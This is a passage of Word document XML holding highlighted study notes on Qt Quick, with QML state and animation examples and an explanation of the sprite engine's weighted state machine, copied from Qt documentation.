          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color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ColorAnimation</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MouseArea</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id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mouser</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anchors</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fill</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parent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hoverEnabled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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00441D0A" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use only explicitly defined states, rather than an implicit base state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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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400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height</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400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Rectangle</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id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coloredRect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width</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100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height</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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anchors</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centerIn</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parent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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on color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ColorAnimation</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MouseArea</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id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mouser</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anchors</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fill</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parent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hoverEnabled</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true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states</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State</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GreenState"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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouser</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containsMouse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PropertyChanges</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target</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coloredRect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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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State</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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"RedState"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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouser</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containsMouse</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00EE2C1C"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target</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> coloredRect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00230BC0"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EE2C1C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</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"red"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRPr="00230BC0"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EE2C1C" w:rsidRPr="00230BC0"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EE2C1C" w:rsidRPr="00230BC0" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">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EE2C1C" w:rsidRPr="00230BC0" w:rsidRDefault="00EE2C1C" w:rsidP="00EE2C1C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00230BC0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE2C1C" w:rsidRDefault="00EE2C1C" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00365F6D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2514" w:history="1">
        <w:r w:rsidR="00365F6D" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-effects-sprites.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00D127FB" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2149" w:name="_Toc483000995"/>
      <w:bookmarkStart w:id="2150" w:name="_Toc483003986"/>
      <w:bookmarkStart w:id="2151" w:name="_Toc483604336"/>
      <w:bookmarkStart w:id="2152" w:name="_Toc483605556"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprite Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2149"/>
      <w:bookmarkEnd w:id="2150"/>
      <w:bookmarkEnd w:id="2151"/>
      <w:bookmarkEnd w:id="2152"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2153" w:name="sprite-engine"/>
      <w:bookmarkStart w:id="2154" w:name="_Toc483000996"/>
      <w:bookmarkStart w:id="2155" w:name="_Toc483003987"/>
      <w:bookmarkStart w:id="2156" w:name="_Toc483604337"/>
      <w:bookmarkStart w:id="2157" w:name="_Toc483605557"/>
      <w:bookmarkEnd w:id="2153"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprite Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2154"/>
      <w:bookmarkEnd w:id="2155"/>
      <w:bookmarkEnd w:id="2156"/>
      <w:bookmarkEnd w:id="2157"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2515" w:history="1">
        <w:r w:rsidRPr="00730344">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sprite engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic state machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> combined with the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chop up images containing multiple frames of an animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2158" w:name="state-machine"/>
      <w:bookmarkStart w:id="2159" w:name="_Toc483000997"/>
      <w:bookmarkStart w:id="2160" w:name="_Toc483003988"/>
      <w:bookmarkStart w:id="2161" w:name="_Toc483604338"/>
      <w:bookmarkStart w:id="2162" w:name="_Toc483605558"/>
      <w:bookmarkEnd w:id="2158"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2159"/>
      <w:bookmarkEnd w:id="2160"/>
      <w:bookmarkEnd w:id="2161"/>
      <w:bookmarkEnd w:id="2162"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A primary function of the sprite engine is its </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal state machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is not the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same as the states and transitions in Qt Quick</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and is more like a conventional state machine. Sprites can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>weighted transitions to other sprites</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or back to themselves. When a sprite animation finishes, the sprite engine will choose the </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>next sprite randomly</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, based on the weighted transitions available for the sprite that just finished.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affect the currently playing sprite in two ways</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrarily </w:t>
      </w:r>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>force it to immediately start playing any sprite</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tell it to gradually transition to a given sprite</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you instruct it to gradually transition, then it will reach the target sprite by going through valid state transitions using the fewest number of intervening sprites (but ignoring relative weightings). This allows you to easily insert a </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">transitional animation </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>between two different sprites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/spriteenginegraph.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png"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"http://doc.qt.io/qt-5/images/spriteenginegraph.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1073" type="#_x0000_t75" alt="" style="width:244.8pt;height:222.9pt">
            <v:imagedata r:id="rId2516" r:href="rId2517"/>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Pr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00D127FB" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As an </w:t>
      </w:r>
      <w:r w:rsidRPr="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, consider the above diagram which illustrates the sprites for a hypothetical 2D platform game character. The character starts by displaying the standing state. From this state, barring external input, he will transition to either the waiting animation, the walking animation, or play the standing animation again. Because the weights for those transitions are one, zero and three respectively, he has a one in four chance of playing the waiting animation when the standing animation finishes, and a three in four chance of playing the standing animation again. This allows for a character who has a slightly animated and variable behavior while waiting.</w:t>
      </w:r>
      <w:r w:rsidR="00730344">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
